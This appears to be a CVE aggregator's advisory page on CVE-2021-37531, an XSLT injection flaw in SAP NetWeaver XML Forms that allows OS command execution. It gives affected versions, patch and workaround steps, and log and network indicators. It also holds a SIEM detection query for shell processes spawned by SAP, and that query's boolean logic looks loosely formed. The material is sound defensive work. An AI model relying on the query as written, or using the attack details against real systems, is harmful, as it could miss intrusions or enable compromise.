CVE-2021-37531 – CVE-2021-37531 is an XSLT injection vulnerabili... (How to Fix)

Q: What is the severity of CVE-2021-37531?

CVE-2021-37531 has a CVSS score of 8.8 (HIGH). CVE-2021-37531 is an XSLT injection vulnerability in SAP NetWeaver Knowledge Management XML Forms that allows authenticated non-administrative users to execute arbitrary OS commands via malicious XSL stylesheets. This can lead to complete system compromise affecting all SAP NetWeaver versions from 7.10 to 7.50. Attackers need authenticated access to exploit this vulnerability.

📋 TL;DR

CVE-2021-37531 is an XSLT injection vulnerability in SAP NetWeaver Knowledge Management XML Forms that allows authenticated non-administrative users to execute arbitrary OS commands via malicious XSL stylesheets. This can lead to complete system compromise affecting all SAP NetWeaver versions from 7.10 to 7.50. Attackers need authenticated access to exploit this vulnerability.

💻 Affected Systems

Products:

SAP NetWeaver Knowledge Management XML Forms

Versions: 7.10, 7.11, 7.30, 7.31, 7.40, 7.50

Operating Systems: All platforms running SAP NetWeaver

Default Config Vulnerable: ⚠️ Yes

Notes: All installations with XML Forms functionality are vulnerable by default. Requires authenticated access but not administrative privileges.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise allowing attackers to execute arbitrary OS commands, steal sensitive data, install malware, pivot to other systems, and maintain persistent access.

🟠

Likely Case

Attackers with authenticated access gain remote code execution, potentially compromising the SAP server and accessing sensitive business data.

🟢

If Mitigated

With proper network segmentation, least privilege access, and monitoring, impact is limited to the affected SAP system with containment preventing lateral movement.

🌐 Internet-Facing: HIGH

🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: CONFIRMED

Unauthenticated Exploit: ✅ No

Complexity: LOW

Public exploit code exists and has been weaponized. Attack requires authenticated access but not admin privileges. XSLT injection leads directly to OS command execution.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Apply SAP Security Note 3081888

Vendor Advisory: https://launchpad.support.sap.com/#/notes/3081888

Restart Required: Yes

Instructions:

1. Download SAP Security Note 3081888 from SAP Support Portal. 2. Apply the note using SAP Note Assistant or transaction SNOTE. 3. Restart the affected SAP system components. 4. Verify the patch is applied correctly.

🔧 Temporary Workarounds

Restrict XSL file uploads

all

Implement strict file upload controls to prevent unauthorized XSL file uploads to the system.

Network segmentation

all

Isolate SAP systems from critical infrastructure and implement strict firewall rules.

🧯 If You Can't Patch

Implement strict access controls to limit authenticated user access to minimum required privileges
Deploy application-level firewalls (WAF) with XSLT injection detection rules

🔍 How to Verify

Check if Vulnerable:

Check if SAP Security Note 3081888 is applied using transaction SNOTE or by checking system patch status.

Check Version:

In SAP GUI, use transaction SM51 or check system information in SAP logon pad.

Verify Fix Applied:

Verify SAP Security Note 3081888 is successfully applied and system has been restarted. Test XSLT functionality with safe test files.

📡 Detection & Monitoring

Log Indicators:

Unusual XSL file uploads
Suspicious OS command execution from SAP processes
Multiple failed authentication attempts followed by successful login

Network Indicators:

Unusual outbound connections from SAP servers
Traffic patterns indicating data exfiltration

SIEM Query:

source="sap_audit_log" AND (event="file_upload" AND file_extension="xsl") OR (process_execution AND parent_process="sap*" AND command_line="cmd*" OR "bash*")

📊 Metadata

CVE ID: CVE-2021-37531

CVSS v3 Score: 8.8 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-78

Published: September 14, 2021

Last Updated: November 21, 2024

🔗 References

http://packetstormsecurity.com/files/165751/SAP-Enterprise-Portal-XSLT-Injection.html Third Party Advisory,VDB Entry
http://seclists.org/fulldisclosure/2022/Jan/75 Mailing List,Third Party Advisory
https://launchpad.support.sap.com/#/notes/3081888 Permissions Required
https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405 Vendor Advisory
http://packetstormsecurity.com/files/165751/SAP-Enterprise-Portal-XSLT-Injection.html Third Party Advisory,VDB Entry
http://seclists.org/fulldisclosure/2022/Jan/75 Mailing List,Third Party Advisory
https://launchpad.support.sap.com/#/notes/3081888 Permissions Required
https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-37531, you might also want to check these:

📋 TL;DR

💻 Affected Systems

📦 What is this software?

Netweaver Knowledge Management Xml Forms by Sap

Netweaver Knowledge Management Xml Forms by Sap

Netweaver Knowledge Management Xml Forms by Sap

Netweaver Knowledge Management Xml Forms by Sap

Netweaver Knowledge Management Xml Forms by Sap

Netweaver Knowledge Management Xml Forms by Sap

⚠️ Risk & Real-World Impact

Worst Case

Likely Case

If Mitigated

🎯 Exploit Status

🛠️ Fix & Mitigation

✅ Official Fix

Instructions:

🔧 Temporary Workarounds

Restrict XSL file uploads

Network segmentation

🧯 If You Can't Patch

🔍 How to Verify

Check if Vulnerable:

Check Version:

Verify Fix Applied:

📡 Detection & Monitoring

Log Indicators:

Network Indicators:

SIEM Query:

📊 Metadata

🔗 References

📤 Share & Export

🔗 Related Vulnerabilities